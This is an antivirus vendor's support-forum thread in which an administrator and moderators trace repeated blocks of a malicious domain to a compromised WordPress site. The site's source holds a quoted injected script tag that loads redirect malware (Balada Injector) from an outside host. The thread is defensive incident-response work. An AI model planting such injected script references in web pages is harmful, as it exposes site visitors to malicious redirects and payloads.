stay.decentralappps.com

[kapela86 10]

I'm getting lots of reports in ESET Protect from different computers that this website "stay.decentralappps.com" was "Blocked by internal blacklist". What I don't know is how this is triggered, what website tried to load it, because all reports come from different browsers.

[Marcos 4,935]

It appears to be a malicious server. Please provide logs collected with ESET Log Collector from the machine.

[kapela86 10]

0c5a17fe-2174-4641-b24d-5ea8fdeb18ad_era-diagnostic-logs_2023-09-21_15-34-14.zip

[itman 1,630]

Definitely a malicious domain;

[Marcos 4,935]

A SysInspector log was not collected. Please provide it as well.

[Marcos 4,935]

To me it looks like SSL/TLS filtering is not working properly, otherwise Web access protection should have detected a malicious JS before it could be executed:

Is the eicar test file downloaded from https://secure.eicar.org/eicar_com.zip detected upon download?

[kapela86 10]

Here's SysInspector log

And about eicar, it was detected before browser even downloaded it, but I tested this on my computer, not the one I sent those reports. All computers have same policy, except some computers where I use Web Filtering with "*" Blocked and I allow specific domains. These logs are from that kind of computer.

SysInspector log export 2023-09-21 16-30-12.zip

[itman 1,630]

The Eicar .zip download should have been blocked by Web Access protection; i.e. HTTP filter;

Time;Scanner;Object type;Object;Detection;Action;User;Information;Hash;First seen here
9/21/2023 11:09:05 AM;HTTP filter;file;https://secure.eicar.org/eicar_com.zip;Eicar test file;connection terminated;xxxxxx;Event occurred during an attempt to access the web by the application: C:\Program Files\Mozilla Firefox\firefox.exe (1EA307959A891AA89787D5101669BB3587D8C48C).;D27265074C9EAC2E2122ED69294DBC4D7CCE9141;

 

[Marcos 4,935]

Are you able to reproduce the detection? If so, is it enough to open Edge or the threat is detected after you have opened a specific website?

[kapela86 10]

If you are talking about stay.decentralappps.com then I can't reproduce it because I don't know what website triggers this, I could check tomorrow on other pc it's web browser history.

And regarding SSL/TLS filtering not working, what do you propose to do?

[Marcos 4,935]

2 minutes ago, kapela86 said:

And regarding SSL/TLS filtering not working, what do you propose to do?

It's working, I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on a disk.

[itman 1,630]

1 minute ago, Marcos said:

It's working, I removed my comment. I was looking at the Process column and because of that I erroneously assumed that the detection was triggered on a disk.

Perhaps not on Chrome? Op's screen shot shows Eicar .zip detection on disk; not via HTTP filter.

[kapela86 10]

I disabled eset, downloaded eicar test file, put it on our internal webserver that doesn't have https, enabled eset and tried downloading it:

[Marcos 4,935]

HTTPS scanning works, obviously the connection was terminated and URI contains an https address. Let's try to reproduce the detection first.

[itman 1,630]

Looks like this domain is well known: https://securedstatus.com/how-to-remove-decentralappps-com/ . As suspected, it is redirect malware.

[kapela86 10]

Looks like it's

epainfo.pl

there is a 

<_script src="https://one.dataofpages.com/stats/post.js" id="temp_weather_script"></script>

in source, they use Wordpress so it's probably some out of date plugin that got hacked.

Edited September 22 by kapela86

[kapela86 10]

One other thing, today Eset started blocking that script

[Marcos 4,935]

The detection was added yesterday. Right now we're working on adding a detection for a related obfuscated malicious JS.

[kapela86 10]

It kinda sux that you can't see what URL user visited that triggered this script. This would be very usefull.

[itman 1,630]

5 hours ago, kapela86 said:

It kinda sux that you can't see what URL user visited that triggered this script. This would be very usefull.

Example of Balada Injector malware deploying stay.decentralappps.com given in this article: https://www.geoedge.com/balda-injectors-2-0-evading-detection-gaining-persistence/ .

Bottom line is any legit but vulnerable web site can be nailed by this.